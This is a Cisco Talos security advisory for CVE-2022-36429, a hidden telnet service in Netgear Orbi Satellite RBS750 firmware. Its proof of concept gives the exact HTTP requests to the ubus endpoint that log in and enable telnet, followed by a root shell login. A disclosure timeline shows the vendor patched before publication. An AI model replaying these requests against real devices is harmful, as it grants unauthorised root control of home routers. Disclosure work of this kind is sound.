CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

SUMMARY

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

PRODUCT URLS

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-912 - Hidden Functionality

DETAILS

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 217
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}

This will return a ‘ubus_rpc_session’ token needed to start the hidden telnet service:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 829
Connection: close
Date: Mon, 11 Jul 2022 19:27:03 GMT
Server: lighttpd/1.4.45

{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}

Once this token is retrieved we simply need to add a parameter called ‘telnet_enable’ to start the service:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 138
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/status.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}

Exploit Proof of Concept

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

$ telnet 10.0.0.4
Trying 10.0.0.4...
Connected to 10.0.0.4.
Escape character is '^]'.

login: admin
Password: === IMPORTANT ============================
 Use 'passwd' to set your login password
 this will disable telnet and enable SSH
------------------------------------------


BusyBox v1.30.1 () built-in shell (ash)

     MM           NM                    MMMMMMM          M       M
   $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
  MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
  MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
    MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
     MMMM          M                    MMMMMMM        M       M
       M
 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
 ---------------------------------------------------------------
root@RBS750:/# 

TIMELINE

2022-08-30 - Initial Vendor Contact
2022-09-05 - Vendor Disclosure
2023-01-19 - Vendor Patch Release
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.